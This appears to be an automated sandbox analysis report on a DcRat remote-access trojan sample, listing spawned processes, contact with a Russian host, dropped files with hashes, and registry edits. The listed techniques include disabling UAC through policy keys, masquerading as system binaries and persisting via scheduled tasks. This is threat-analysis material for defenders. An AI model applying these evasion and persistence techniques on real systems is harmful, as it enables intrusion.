"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8ca98162-3d6a-4a27-b81a-fe696b8f376d.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8526f789-beb6-40ef-aee9-a6b5bb5143da.vbs"

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\70ce8163-641e-4dd6-9974-4cad816e5fb0.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\148b7e11-ee7d-4d81-9d9a-eabcd024a733.vbs"

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1966821b-46e2-4bd3-92f2-7358e42a5a80.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cfd4f19f-9276-44f0-8e38-404f7146c46b.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 a0887556.xsph.ru udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp

Files

memory/2380-12-0x00000000004F0000-0x00000000004FA000-memory.dmp

memory/2380-11-0x0000000000510000-0x0000000000520000-memory.dmp

memory/2380-10-0x0000000000460000-0x0000000000468000-memory.dmp

memory/2380-9-0x0000000000440000-0x0000000000456000-memory.dmp

memory/2380-8-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2380-7-0x00000000001E0000-0x00000000001E8000-memory.dmp

memory/2380-6-0x0000000000400000-0x000000000041C000-memory.dmp

memory/2380-5-0x00000000001D0000-0x00000000001D8000-memory.dmp

memory/2380-4-0x00000000001C0000-0x00000000001CE000-memory.dmp

memory/2380-3-0x00000000001B0000-0x00000000001BE000-memory.dmp

memory/2380-2-0x000007FEF5A70000-0x000007FEF645C000-memory.dmp

memory/2380-1-0x0000000000C20000-0x0000000000F5C000-memory.dmp

memory/2380-0-0x000007FEF5A73000-0x000007FEF5A74000-memory.dmp

memory/2380-13-0x0000000000520000-0x0000000000576000-memory.dmp

memory/2380-14-0x0000000002460000-0x000000000246C000-memory.dmp

memory/2380-15-0x0000000002470000-0x0000000002478000-memory.dmp

memory/2380-16-0x0000000002480000-0x000000000248C000-memory.dmp

memory/2380-17-0x0000000002490000-0x0000000002498000-memory.dmp

memory/2380-18-0x00000000024A0000-0x00000000024B2000-memory.dmp

memory/2380-19-0x00000000024B0000-0x00000000024BC000-memory.dmp

memory/2380-20-0x000000001A9E0000-0x000000001A9EC000-memory.dmp

memory/2380-21-0x000000001A9F0000-0x000000001A9FC000-memory.dmp

memory/2380-22-0x000000001AA00000-0x000000001AA0C000-memory.dmp

memory/2380-23-0x000000001AA10000-0x000000001AA18000-memory.dmp

memory/2380-25-0x000000001AF50000-0x000000001AF5E000-memory.dmp

memory/2380-24-0x000000001AF40000-0x000000001AF4A000-memory.dmp

memory/2380-26-0x000000001AF60000-0x000000001AF68000-memory.dmp

memory/2380-27-0x000000001AFF0000-0x000000001AFFE000-memory.dmp

memory/2380-28-0x000000001B000000-0x000000001B00C000-memory.dmp

memory/2380-29-0x000000001B010000-0x000000001B018000-memory.dmp

memory/2380-30-0x000000001B020000-0x000000001B02A000-memory.dmp

memory/2380-31-0x000000001B030000-0x000000001B03C000-memory.dmp

memory/2380-32-0x000007FEF5A70000-0x000007FEF645C000-memory.dmp

C:\Users\Default\Downloads\dwm.exe

MD5 1553f67a0859a3057cde01f77db9dbc0
SHA1 2cfe40d1fea16093e16c96a35f3240b98da9a5e1
SHA256 a9ac10090fed177df3867fc88eda57dd852c595dde10953b7b798523e1043152
SHA512 4ff68e4ad4299aa2ca2be8dfd1742d641cf9aee6b687f94b1e3c68062630b2e167a13550a8a184c8ff5a3df1da5b3182ebd29759a84a219af37a8688df6f0de5

C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\dllhost.exe

MD5 325ab4cde5aecfae8d6ec0b25d8d3b91
SHA1 9761ef61579af9d336742d9713c97e4f25754fc4
SHA256 962b6e4d5391f0fb417f483f3da6158cb235348990910b9febb4838795a0220f
SHA512 25997b198f35f043c635f5cedc2f3c6a680c64d8ca5772d48229f25cc3503ce03ef6070b2c2d8c1a4d203a2fb39e37869d8eee6838ffbedd9c0ef87211bc6cd3

C:\Windows\LiveKernelReports\lsass.exe

MD5 3023d473a232c30ac5508e987117dcfa
SHA1 b1281d49ec300fbb81b116915205e3df11b22b1e
SHA256 00580a7b6017eaa317ea0ecb26fb3249cd8b53e5b6e02041f7b4d0790aaa6c7e
SHA512 0e5147b8c73c986fca106bc9ffeba969392dd88cd6c90e1d8172b730f544ed593731f666d87f5a54693fed9cc120e0f2a597045bbdba04c377f04d8ee5a3b828

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 fb52e6e949decc6a10e4aa81a379c4a7
SHA1 068a4772951abb25314c24159cff8214b2ab4269
SHA256 fed2bdbdb506bca7f2086a718c56a682b9a4de8f1cc8942890ea254fb4f72727
SHA512 191e474a8cc287f6180a628365b2639a58c8587caac9e173048257a8734d0deba1ac1a45495f6ef72b98bcec1aae99b0ed02ba8e3c38712cdb4c385bc9a9a93c

memory/664-231-0x000000001B230000-0x000000001B512000-memory.dmp

memory/664-239-0x00000000022F0000-0x00000000022F8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ZulfStaN0H.bat

MD5 45195d6b4979756c0ad21b67b9e1831e
SHA1 82db6ac0e69e5424667955c258e4937baf0749a6
SHA256 94321fadc372ec3ae98a7c1b86c60301f380d14a5083c5d39d7acdffa4418ad1
SHA512 7f63b69ec74b94b97409a138a4dbca5b0ac15b25070e09e7bce3c7b695778146307a0322ea769c4f97b3e0a89fd756e85565b873b973030e69bcca765da4a96a

memory/2380-276-0x000007FEF5A70000-0x000007FEF645C000-memory.dmp

memory/2612-279-0x0000000001370000-0x00000000016AC000-memory.dmp

memory/2612-280-0x0000000001260000-0x00000000012B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7ffff686-4516-46fa-9f0d-2e8ef0881a28.vbs

MD5 e83026a7357a2e644a6438dcbc26caef
SHA1 554c63ddbc4fd1e65a8ecc37d1170e45fe009831
SHA256 b69ea6fd70dd4a4979a7a4b1e0323e697498baf9f4d3ee94162af114f6a5dba0
SHA512 681b36ae2ab98ddb5395e13add638f954388e67ee65dffa78ddfc50671995af935269e3b6eb2c470b66dff992ee674a220f6acdb47924d323f34e009fb7c91fe

C:\Users\Admin\AppData\Local\Temp\023fb7b8-b690-4d75-b756-fba66941e125.vbs

MD5 fd89b79f32faf02cd4d131f6f4791064
SHA1 3261963b0ed0d6266b96e3a00607ce733d5b1361
SHA256 cc163745e88b36f2b7c651051b417a559e4f796b7f2fc915b973d1311a7910e0
SHA512 695bbae3fcdce21a58e65043f1797f0113417f3aa096ca4f1ea4b02ac473a93c0c397f816b4b38c3d32893007a9fb044329e47cc68c2bc63948d0959a89f7b08

C:\Users\Admin\AppData\Local\Temp\ca1033d37860b7102ff60b8f8b730d81674a1cfb.exe

MD5 1415988fb81427713469cc9232c1410e
SHA1 b5ef5fe6d4c8fd6e999fc9c3aba4e248c832abb2
SHA256 53c5ad2b80527745e383b5e13dc55612089ee5b8f7d618d0e0ed190605f79482
SHA512 b0492f41e6cf2104958b59eea7a6e58c767e9bb1970b6076bf2bffa17e41071cb897357661da77a185acae0340ac58e71f17c21388eeac42bf8c1e693331c0d9

C:\Users\Admin\AppData\Local\Temp\28d0c9de-bce9-431f-b7c4-b0c31daffd5d.vbs

MD5 f79903abd422c2d05a57205ee5907433
SHA1 835d541b79cd08c240c6b4898b71f2942fad49ca
SHA256 4d85ca388a8d39d12bcf3214a39bdf600e045068d0a4b360771f82933135317b
SHA512 cc1b78918e5352a69ffcd9e65006536090db118a6ba7c82f2652a530cb76083c4c9bf4a7aa0d722e94a7ff4b53ac8bf9885c8cecb2fef7916c1711c32fcae9f0

memory/2740-302-0x0000000000040000-0x000000000037C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8ca98162-3d6a-4a27-b81a-fe696b8f376d.vbs

MD5 6cc7946cc438d7ab70de9c1dff330f88
SHA1 cc022a49a848c30af0680f4780b99eb55c9ff6b8
SHA256 dc445a3723df2b7f574eb8ff8b367c36c98819788d36599f4eef7fdf9d7d6f20
SHA512 5fa3424636b72cbcaaaa8d483669147ac950790caf2d3c3db12ef4be9075e89ba97cd393e6f553cfbd13fdd2b3fcd482ee1aadcffb4ea5dbfe1d167e8f17edaa

memory/2256-314-0x0000000001000000-0x000000000133C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\70ce8163-641e-4dd6-9974-4cad816e5fb0.vbs

MD5 87716e5f6941d601eee2e1a6652caedc
SHA1 6aa60dff27d85a70d48e13b2d56e14dfad0de977
SHA256 12a52b4638715aae2fe948cca42454cab337c1a122415d039de252cf4bec9a20
SHA512 2f4c7fb0b3dc91caa425a6661dff694a29115e77142a1debea6ce49c960b98ffb89bc92a77897f248b57f22319652d764cb26c8c81c4c8f4e0bfff4b89be2638

memory/2496-326-0x0000000001220000-0x000000000155C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1966821b-46e2-4bd3-92f2-7358e42a5a80.vbs

MD5 5a1cfab63fa8629e8415bf53e0ed3c2f
SHA1 23b44f80af6f3a376030049e67de00cd59dd3a4e
SHA256 d387f5a447458c34771372eb5ffedede135ed4dece4112ebb5a14a555254bb86
SHA512 fa5e205632fc2cfd239c8b11bd120f20e3f9f8bd2d79a94af61758d11c8630bed749fc0511eb79239026d58ead7eecd224f48439a910584b6b060def7a45e250

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-14 19:23

Reported

2024-05-14 19:25

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe"

Signatures

DcRat

rat infostealer dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Users\All Users\Start Menu\dwm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Users\All Users\Start Menu\dwm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Users\All Users\Start Menu\dwm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Users\All Users\Start Menu\dwm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Users\All Users\Start Menu\dwm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Users\All Users\Start Menu\dwm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Users\All Users\Start Menu\dwm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\All Users\Start Menu\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\All Users\Start Menu\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\All Users\Start Menu\dwm.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Photo Viewer\lsass.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\Windows NT\TableTextService\en-US\RCX6F58.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\dotnet\smss.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\66fc9ff0ee96c2 C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\sppsvc.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\RCX6AC1.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\RCX6D54.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\6203df4a6bafc7 C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\wininit.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Defender\RCX5C5D.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\RCX60C5.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\RCX6CD6.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\0a1fd5f707cd16 C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files\Windows NT\TableTextService\en-US\886983d96e3d3e C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Defender\RCX5C4D.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\RCX7899.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
